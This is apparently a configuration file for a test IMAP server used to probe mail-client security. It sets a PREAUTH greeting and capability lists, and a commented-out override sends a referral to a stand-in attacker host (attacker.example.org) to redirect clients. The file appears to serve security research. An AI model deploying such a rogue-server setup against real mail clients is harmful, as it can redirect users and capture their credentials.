(
	state: Authenticated,
	greeting: PreAuth(
		tag: None,
		code: Some(Capability([Imap4Rev1, MailboxReferrals])),
		text: Text("IMAP server ready.")
	),
	caps: [Imap4Rev1, MailboxReferrals],
	caps_tls: [],
	caps_auth: [],
	caps_tls_auth: [],

        //override_select: Some(No(
        //    tag: Some("<tag>"),
        //    code: Some(Referral("IMAP://;AUTH=*@attacker.example.org:243/inbox")),
        //    text: Text("select failed."),
        //)),

	pkcs12: (
		file: "certs/example.org.p12",
		password: "changeit",
	),
	implicit_tls: false,
)

